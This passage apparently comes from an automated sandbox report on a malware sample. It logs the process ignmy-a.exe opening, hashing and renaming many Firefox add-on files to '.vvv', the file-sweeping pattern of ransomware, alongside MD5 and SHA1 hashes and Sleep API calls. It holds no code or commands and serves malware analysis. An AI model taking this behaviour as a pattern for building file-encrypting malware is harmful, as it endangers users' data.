  10717. File   
  10718. Open
  10719.    
  10720. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10721.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sim
  10722.   ple-storage.js
  10723.     828     8614
  10724. File   
  10725. Close
  10726.    
  10727. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10728.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sim
  10729.   ple-storage.js
  10730.  MD5:  88750ef1e4da6706bb408848d8941818
  10731.  SHA1: 379333e26b2d2d11e6e72e9512b9c54ef51cad53
  10732.     828     9038
  10733. File   
  10734. Rename
  10735.    
  10736. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10737.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sim
  10738.   ple-storage.js
  10739. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10740.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sim
  10741.   ple-storage.js.vvv
  10742.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10743.  MD5:  88750ef1e4da6706bb408848d8941818
  10744.  SHA1: 379333e26b2d2d11e6e72e9512b9c54ef51cad53
  10745.     828     9038
  10746. File   
  10747. Open
  10748.    
  10749. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10750.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tab
  10751.   s.js
  10752.     828     2723
  10753. File   
  10754. Close
  10755.    
  10756. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10757.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tab
  10758.   s.js
  10759.  MD5:  c55ad3f89ff0a915655d3df2b5800e6e
  10760.  SHA1: 781e09e7269d50ce61e8cd17d6a3fd8662eb476f
  10761.     828     3150
  10762. File   
  10763. Rename
  10764.    
  10765. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10766.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tab
  10767.   s.js
  10768. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10769.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tab
  10770.   s.js.vvv
  10771.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10772.  MD5:  c55ad3f89ff0a915655d3df2b5800e6e
  10773.  SHA1: 781e09e7269d50ce61e8cd17d6a3fd8662eb476f
  10774.     828     3150
  10775. File   
  10776. Open
  10777.    
  10778. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10779.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tim
  10780.   ers.js
  10781.     828     1821
  10782. File   
  10783. Close
  10784.    
  10785. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10786.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tim
  10787.   ers.js
  10788.  MD5:  6259c7f7e8ad1edf7e74558b822bf4e9
  10789.  SHA1: 5e79dcd8bff3545352d43ed537c4206647691c47
  10790.     828     2238
  10791. File   
  10792. Rename
  10793.    
  10794. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10795.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tim
  10796.   ers.js
  10797. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10798.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\tim
  10799.   ers.js.vvv
  10800.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10801.  MD5:  6259c7f7e8ad1edf7e74558b822bf4e9
  10802.  SHA1: 5e79dcd8bff3545352d43ed537c4206647691c47
  10803.     828     2238
  10804. File   
  10805. Open
  10806.    
  10807. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10808.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\wid
  10809.   get.js
  10810.     828     29701
  10811. File   
  10812. Close
  10813.    
  10814. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10815.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\wid
  10816.   get.js
  10817.  MD5:  b789083f2b75ec03aa8cf8ea56fcdba8
  10818.  SHA1: 950e9fb56ed185d719ddd5dc196d448a0c7eb137
  10819.     828     30126
  10820. API Call   
  10821.    
  10822.  API Name:  Sleep   Address:  0x0041f00b
  10823.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  10824.     828      
  10825. File   
  10826. Rename
  10827.    
  10828. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10829.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\wid
  10830.   get.js
  10831. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10832.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\wid
  10833.   get.js.vvv
  10834.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10835.  MD5:  b789083f2b75ec03aa8cf8ea56fcdba8
  10836.  SHA1: 950e9fb56ed185d719ddd5dc196d448a0c7eb137
  10837.     828     30126
  10838. File   
  10839. Open
  10840.    
  10841. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10842.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\win
  10843.   dows.js
  10844.     828     8643
  10845. File   
  10846. Close
  10847.    
  10848. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10849.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\win
  10850.   dows.js
  10851.  MD5:  4dc46c8cc9bc2772768272b8dc5035d9
  10852.  SHA1: 6e1900f4edf522477de77d94be1d3cd93c4ff861
  10853.     828     9070
  10854. File   
  10855. Rename
  10856.    
  10857. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10858.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\win
  10859.   dows.js
  10860. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10861.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\win
  10862.   dows.js.vvv
  10863.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10864.  MD5:  4dc46c8cc9bc2772768272b8dc5035d9
  10865.  SHA1: 6e1900f4edf522477de77d94be1d3cd93c4ff861
  10866.     828     9070
  10867. File   
  10868. Open
  10869.    
  10870. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10871.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bo
  10872.   otstrap-remote-process.js
  10873.     828     6665
  10874. File   
  10875. Close
  10876.    
  10877. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10878.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bo
  10879.   otstrap-remote-process.js
  10880.  MD5:  36f6cd8b8dd4e8d79852e3d17cdbab48
  10881.  SHA1: ec2f154608bafecb2c2d85b54647d1e3607d2692
  10882.     828     7086
  10883. File   
  10884. Rename
  10885.    
  10886. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10887.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bo
  10888.   otstrap-remote-process.js
  10889. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10890.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\bo
  10891.   otstrap-remote-process.js.vvv
  10892.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10893.  MD5:  36f6cd8b8dd4e8d79852e3d17cdbab48
  10894.  SHA1: ec2f154608bafecb2c2d85b54647d1e3607d2692
  10895.     828     7086
  10896. File   
  10897. Open
  10898.    
  10899. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10900.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-data\te
  10901.   st-content-symbiont.js
  10902.     828      
  10903. File   
  10904. Open
  10905.    
  10906. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10907.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api
  10908.   -utils.js
  10909.     828     7265
  10910. File   
  10911. Close
  10912.    
  10913. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10914.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api
  10915.   -utils.js
  10916.  MD5:  3f42ad569af3db4fcbe3656ef042d168
  10917.  SHA1: 8f3a6b38795b97d61ff4d8cb83048f939c617203
  10918.     828     7694
  10919. File   
  10920. Rename
  10921.    
  10922. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10923.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api
  10924.   -utils.js
  10925. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10926.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\api
  10927.   -utils.js.vvv
  10928.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10929.  MD5:  3f42ad569af3db4fcbe3656ef042d168
  10930.  SHA1: 8f3a6b38795b97d61ff4d8cb83048f939c617203
  10931.     828     7694
  10932. File   
  10933. Open
  10934.    
  10935. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10936.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app
  10937.   -strings.js
  10938.     828     3345
  10939. File   
  10940. Close
  10941.    
  10942. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10943.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app
  10944.   -strings.js
  10945.  MD5:  b2878bfc894b696eefe1e5e6ce39ff35
  10946.  SHA1: 04fb590f3ca812b118a3bcb9987200530c6c1b78
  10947.     828     3774
  10948. File   
  10949. Rename
  10950.    
  10951. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10952.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app
  10953.   -strings.js
  10954. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10955.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\app
  10956.   -strings.js.vvv
  10957.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10958.  MD5:  b2878bfc894b696eefe1e5e6ce39ff35
  10959.  SHA1: 04fb590f3ca812b118a3bcb9987200530c6c1b78
  10960.     828     3774
  10961. File   
  10962. Open
  10963.    
  10964. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10965.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\arr
  10966.   ay.js
  10967.     828     3428
  10968. File   
  10969. Close
  10970.    
  10971. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10972.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\arr
  10973.   ay.js
  10974.  MD5:  839e3fc301229f5d530313648f479727
  10975.  SHA1: 76b48c170f7c78102d59fca06051b2c8283d188d
  10976.     828     3854
  10977. File   
  10978. Rename
  10979.    
  10980. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10981.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\arr
  10982.   ay.js
  10983. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10984.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\arr
  10985.   ay.js.vvv
  10986.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10987.  MD5:  839e3fc301229f5d530313648f479727
  10988.  SHA1: 76b48c170f7c78102d59fca06051b2c8283d188d
  10989.     828     3854
  10990. File   
  10991. Open
  10992.    
  10993. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10994.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byt
  10995.   e-streams.js
  10996.     828     4280
  10997. File   
  10998. Close
  10999.    
  11000. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11001.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byt
  11002.   e-streams.js
  11003.  MD5:  eaba973e15a32a2472b243e662937243
  11004.  SHA1: 59bbd9cc0cf155cbfc7b0237fd780e6127ffa884
  11005.     828     4702
  11006. File   
  11007. Rename
  11008.    
  11009. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11010.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byt
  11011.   e-streams.js
  11012. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11013.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\byt
  11014.   e-streams.js.vvv
  11015.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11016.  MD5:  eaba973e15a32a2472b243e662937243
  11017.  SHA1: 59bbd9cc0cf155cbfc7b0237fd780e6127ffa884
  11018.     828     4702
  11019. File   
  11020. Open
  11021.    
  11022. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11023.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\col
  11024.   lection.js
  11025.     828     4774
  11026. File   
  11027. Close
  11028.    
  11029. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11030.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\col
  11031.   lection.js
  11032.  MD5:  664e168e0d9044b38b17d17076a37485
  11033.  SHA1: 6f09717fd85dd06fc03090ad20b656222735fcab
  11034.     828     5198
  11035. File   
  11036. Rename
  11037.    
  11038. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11039.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\col
  11040.   lection.js
  11041. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11042.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\col
  11043.   lection.js.vvv
  11044.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11045.  MD5:  664e168e0d9044b38b17d17076a37485
  11046.  SHA1: 6f09717fd85dd06fc03090ad20b656222735fcab
  11047.     828     5198
  11048. File   
  11049. Open
  11050.    
  11051. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11052.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11053.   tent\content-proxy.js
  11054.     828     18559
  11055. API Call   
  11056.    
  11057.  API Name:  Sleep   Address:  0x0041f00b
  11058.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  11059.     828      
  11060. File   
  11061. Close
  11062.    
  11063. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11064.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11065.   tent\content-proxy.js
  11066.  MD5:  dab34628fb40d04e2d81e1befdb8e0f1
  11067.  SHA1: bdc395916f6f76b31923ed03a40ace73a11ed353
  11068.     828     18974
  11069. File   
  11070. Rename
  11071.    
  11072. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11073.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11074.   tent\content-proxy.js
  11075. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11076.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11077.   tent\content-proxy.js.vvv
  11078.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11079.  MD5:  dab34628fb40d04e2d81e1befdb8e0f1
  11080.  SHA1: bdc395916f6f76b31923ed03a40ace73a11ed353
  11081.     828     18974
  11082. File   
  11083. Open
  11084.    
  11085. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11086.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11087.   tent\loader.js
  11088.     828     6915
  11089. File   
  11090. Close
  11091.    
  11092. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11093.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11094.   tent\loader.js
  11095.  MD5:  6c3945c8058cdd4df47f5aca47c64c2a
  11096.  SHA1: 935f4a118645fdcd0672eb95dd112913b45f6376
  11097.     828     7342
  11098. File   
  11099. Rename
  11100.    
  11101. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11102.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11103.   tent\loader.js
  11104. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11105.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11106.   tent\loader.js.vvv
  11107.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11108.  MD5:  6c3945c8058cdd4df47f5aca47c64c2a
  11109.  SHA1: 935f4a118645fdcd0672eb95dd112913b45f6376
  11110.     828     7342
  11111. File   
  11112. Open
  11113.    
  11114. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11115.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11116.   tent\symbiont.js
  11117.     828     6993
  11118. File   
  11119. Close
  11120.    
  11121. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11122.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11123.   tent\symbiont.js
  11124.  MD5:  b3c1b15215974fcf1dc214e066e58b25
  11125.  SHA1: c64d367484969a8a48ca5a81266979a032054180
  11126.     828     7422
  11127. File   
  11128. Rename
  11129.    
  11130. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11131.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11132.   tent\symbiont.js
  11133. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11134.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11135.   tent\symbiont.js.vvv
  11136.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11137.  MD5:  b3c1b15215974fcf1dc214e066e58b25
  11138.  SHA1: c64d367484969a8a48ca5a81266979a032054180
  11139.     828     7422
  11140. File   
  11141. Open
  11142.    
  11143. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11144.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11145.   tent\worker.js
  11146.     828     19369
  11147. File   
  11148. Close
  11149.    
  11150. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11151.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11152.   tent\worker.js
  11153.  MD5:  934c15c2cffb1e98703c68520f937ab9
  11154.  SHA1: 4149a1249e24ba40933125d4f7f31654aa6b9464
  11155.     828     19790
  11156. File   
  11157. Rename
  11158.    
  11159. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11160.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11161.   tent\worker.js
  11162. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11163.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11164.   tent\worker.js.vvv
  11165.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11166.  MD5:  934c15c2cffb1e98703c68520f937ab9
  11167.  SHA1: 4149a1249e24ba40933125d4f7f31654aa6b9464
  11168.     828     19790
  11169. File   
  11170. Open
  11171.    
  11172. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11173.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11174.   tent.js
  11175.     828     2013
  11176. File   
  11177. Close
  11178.    
  11179. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11180.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11181.   tent.js
  11182.  MD5:  6e1d67fdc62174378bc317cf1a83c84f
  11183.  SHA1: a172520875d347f338ae2c2811efc1a627d2293b
  11184.     828     2430
  11185. File   
  11186. Rename
  11187.    
  11188. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11189.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11190.   tent.js
  11191. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11192.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\con
  11193.   tent.js.vvv
  11194.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11195.  MD5:  6e1d67fdc62174378bc317cf1a83c84f
  11196.  SHA1: a172520875d347f338ae2c2811efc1a627d2293b
  11197.     828     2430
  11198. File   
  11199. Open
  11200.    
  11201. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11202.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cor
  11203.   tex.js
  11204.     828     6193
  11205. API Call   
  11206.    
  11207.  API Name:  Sleep   Address:  0x0041f00b
  11208.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  11209.     828      
  11210. File   
  11211. Close
  11212.    
  11213. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11214.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cor
  11215.   tex.js
  11216.  MD5:  0cd753c98112f21df6d5fcd3ac60f1d9
  11217.  SHA1: 5869378ee21f27af4134fa77d121c050efe9ddfd
  11218.     828     6622
  11219. File   
  11220. Rename
  11221.    
  11222. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11223.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cor
  11224.   tex.js
  11225. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11226.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cor
  11227.   tex.js.vvv
  11228.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11229.  MD5:  0cd753c98112f21df6d5fcd3ac60f1d9
  11230.  SHA1: 5869378ee21f27af4134fa77d121c050efe9ddfd
  11231.     828     6622
  11232. File   
  11233. Open
  11234.    
  11235. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
